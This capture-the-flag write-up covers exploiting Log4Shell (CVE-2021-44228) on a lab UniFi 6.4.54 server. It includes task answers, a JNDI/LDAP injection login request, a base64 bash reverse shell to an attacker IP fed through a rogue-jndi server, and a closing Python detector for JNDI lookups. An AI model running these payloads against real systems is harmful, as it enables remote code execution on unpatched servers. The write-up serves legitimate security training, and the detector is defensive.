# Task 1
Q:What ports are open?
```text
┌──(root💀kali)-[~]
└─# nmap -sV -Pn 10.129.248.11
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-09 16:50 CST
Nmap scan report for 10.129.248.11
Host is up (0.50s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
8443/tcp open  ssl/nagios-nsca Nagios NSCA/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 157.90 seconds
```
A quick nmap scan gives the answer straight away!
A:22,6789,8080,8443
# Task 2
Q:Name of the software that is running on the highest port?
nmap could not identify the service from the port alone, so let's open it in a browser and see:
```text
Bad Request
This combination of host and port requires TLS.
```
The error tells us the port requires TLS, so we access it over https.
This one can probably only be identified by eye, then by searching manually for what the software is ==、
A:UniFI network
# Task 3
Q:What is the version of the software that is running?
The version number is printed under the logo on the page ==、
A:6.4.54
# Task 4
Q:What is the CVE for the identified vulnerability?
Searching for the software name plus the version number turns up a vulnerability: CVE-2021-44228
A:cve-2021-44228
# Task 5
Q:What is the version of Maven that we installed?
A: 3.6.3
# Task 6
Q:What protocol does JNDI leverage in the injection?
A: ldap
# Task 7
Q:What tool do we use to intercept the traffic, indicating the attack was successful?
A: tcpdump
# Task 8
Q:What port do we need to inspect intercepted traffic for?
A: 389
# Task 9
Q:What port is the MongoDB service running on?
A: 27117
# Task 10
Q:What is the default database name for UniFi applications?
A: ace
# Task 11
Q:What is the function we use to enumerate users within the database in MongoDB?
A: db.admin.find()
# Task 12
Q:What is the function to add data to the database in MongoDB?
A: db.admin.insert()
# Task 13
Q:What is the function we use to update users within the database in MongoDB?
A: db.admin.update()
# Task 14
Q:What is the password for the root user?
A:
# Flag
Start by port-scanning with nmap.
That reveals the service, which was already covered in the earlier tasks.
Once we know the CMS, look up the matching vulnerability.
The vulnerability is cve-2021-44228.
We look up an article on this vulnerability and exploit it directly.
First start listening for traffic: `sudo tcpdump -i tun0`
Then intercept the login request as it is sent,
and put the log4j2 payload in the `remember` field:
```http
POST /api/login HTTP/1.1
Host: 10.129.96.149:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.129.96.149:8443/manage/account/login?redirect=%2Fmanage
Content-Type: application/json; charset=utf-8
Origin: https://10.129.96.149:8443
Content-Length: 71
Te: trailers
Connection: close

{"username":"admin","password":"123456","remember":${jndi:ldap://10.10.16.61/o=tomcat},"strict":true}
```
Change the IP in the payload to your own interface IP.
If the vulnerability is present, the target will connect back to that address.
Forward the request and data shows up in tcpdump,
which means a callback was made,
confirming the log4j vulnerability.
Next we need to build a class package.
First install maven:
```shell
┌──(root💀kali)-[~/桌面/rogue-jndi-master]
└─# apt install maven
```
After installing, download a ready-made exploit:
https://github.com/veracode-research/rogue-jndi
Inside the directory, run `mvn package` to build it.
When the build finishes it prints `BUILD SUCCESS`.
Next we base64-encode the reverse-shell payload:
```shell
┌──(root💀kali)-[~/桌面/rogue-jndi-master]
└─# echo 'bash -c bash -i >&/dev/tcp/10.10.16.61/4444 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuNjEvNDQ0NCAwPiYxCg==
```
Next we start the service:
```shell
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuNjEvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.16.61"
```
Listen on port 4444:
```shell
nc -lnvp 4444
```
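As an added defender-side example (not part of this writeup or of rogue-jndi), the Python script below applies the two checks used above the way a detection engineer would: it scans a raw login request for a `${jndi:...}` lookup and extracts the callback host and port, then correlates that with tcpdump lines to confirm the server really connected out on 389. All hosts, ports and sample lines are constructed from the values on this page; the regex handles only the plain lookup form shown here.

```python
import re

# Default ports of the URL schemes JNDI lookups are commonly seen with (ldap is the one on this page).
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099}

# Captures scheme, host and optional port of a ${jndi:...} lookup. Plain form only;
# production rules also need nested-lookup obfuscation, which this page does not cover.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?", re.IGNORECASE
)

# "IP src.sport > dst.dport:" as printed by `tcpdump -i tun0` in the writeup.
TCPDUMP_RE = re.compile(r"IP (?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+):")


def find_jndi_lookups(raw_request: str) -> list:
    """Scan raw request text (headers and body) for JNDI lookups.
    The body is scanned as a raw string on purpose: the payload above is inserted
    unquoted, so the body is not valid JSON and json.loads() would raise first."""
    hits = []
    for m in JNDI_RE.finditer(raw_request):
        scheme = m.group("scheme").lower()
        port = int(m.group("port")) if m.group("port") else DEFAULT_PORTS.get(scheme)
        hits.append({"scheme": scheme, "host": m.group("host"), "port": port})
    return hits


def confirm_callback(hits: list, tcpdump_lines: list) -> list:
    """Return the lookups for which the capture shows an outbound connection to the
    lookup's host:port, i.e. the server resolved the lookup and is vulnerable."""
    outbound = set()
    for line in tcpdump_lines:
        m = TCPDUMP_RE.search(line)
        if m:
            outbound.add((m.group("dst"), int(m.group("dport"))))
    return [h for h in hits if (h["host"], h["port"]) in outbound]


# Constructed samples: the login body from the writeup, a benign one, and a tcpdump excerpt.
MALICIOUS_BODY = ('{"username":"admin","password":"123456",'
                  '"remember":${jndi:ldap://10.10.16.61/o=tomcat},"strict":true}')
BENIGN_BODY = '{"username":"admin","password":"123456","remember":true,"strict":true}'
CAPTURE = [
    "16:51:02.101 IP 10.129.96.149.51234 > 10.10.16.61.389: Flags [S], seq 1, win 64240",
    "16:51:02.102 IP 10.10.16.61.389 > 10.129.96.149.51234: Flags [R.], seq 0, ack 2, win 0",
]

if __name__ == "__main__":
    hits = find_jndi_lookups(MALICIOUS_BODY)
    print(hits, confirm_callback(hits, CAPTURE), find_jndi_lookups(BENIGN_BODY))
```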